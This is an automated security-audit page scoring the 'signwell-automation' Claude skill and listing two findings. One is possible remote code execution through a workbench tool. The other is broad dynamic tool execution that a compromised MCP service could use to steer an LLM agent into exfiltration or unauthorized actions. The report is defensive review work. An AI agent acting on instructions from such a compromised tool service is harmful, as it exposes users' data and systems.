Security Audit
signwell-automation
github.com/ComposioHQ/awesome-claude-skillsTrust Assessment
signwell-automation received a trust score of 84/100, placing it in the Mostly Trusted category. This skill has passed most security checks with only minor considerations noted.
SkillShield's automated analysis identified 2 findings: 0 critical, 1 high, 1 medium, and 0 low severity. Key findings include Potential Remote Code Execution via RUBE_REMOTE_WORKBENCH, Dynamic Tool Execution Grants Broad Permissions.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. All layers scored 70 or above, reflecting consistent security practices.
Last analyzed on February 17, 2026 (commit 99e2a295). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings2
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| HIGH | Potential Remote Code Execution via RUBE_REMOTE_WORKBENCH The skill's 'Quick Reference' section lists `RUBE_REMOTE_WORKBENCH` with `run_composio_tool()` as an approach for 'Bulk ops'. The term 'workbench' often implies an environment for executing arbitrary code or commands. Without further constraints or explicit documentation on the capabilities and security model of `run_composio_tool()`, this suggests a potential for remote code execution or command injection if the LLM is instructed to use this tool with malicious or unvalidated input. This could allow an attacker to execute arbitrary code on the remote system or within the Composio environment. Provide explicit documentation and strict input validation for `RUBE_REMOTE_WORKBENCH` and `run_composio_tool()`. Ensure it operates within a sandboxed environment and does not allow arbitrary code execution. If it is intended for code execution, clearly state its capabilities and security implications, and ensure the LLM is instructed to use it only with trusted, pre-defined scripts or with a human-in-the-loop approval process. | LLM | SKILL.md:80 | |
| MEDIUM | Dynamic Tool Execution Grants Broad Permissions The core workflow pattern instructs the LLM to dynamically discover tools using `RUBE_SEARCH_TOOLS` and then execute them via `RUBE_MULTI_EXECUTE_TOOL` based on the discovered `tool_slug` and `arguments`. This pattern grants the LLM broad permissions to execute any tool exposed by the Rube MCP service. If the Rube MCP service is compromised or exposes tools with unintended or malicious capabilities, the LLM could be instructed to perform actions beyond its intended scope, potentially leading to data manipulation, exfiltration, or unauthorized operations. The skill explicitly advises 'Always search first' and to use 'TOOL_SLUG_FROM_SEARCH', reinforcing this dynamic and potentially unconstrained execution model. Implement strict access controls and allow-listing for tools that the LLM is permitted to discover and execute. The LLM's environment should enforce policies that limit the scope of actions it can take, even if a tool is technically available via Rube MCP. Consider a human-in-the-loop for sensitive operations or a more constrained set of pre-approved tools to mitigate the risk of executing malicious or unintended commands from a compromised external service. | LLM | SKILL.md:34 |
Scan History
Embed Code
[](https://skillshield.io/report/959b044bae4ebce7)
Powered by SkillShield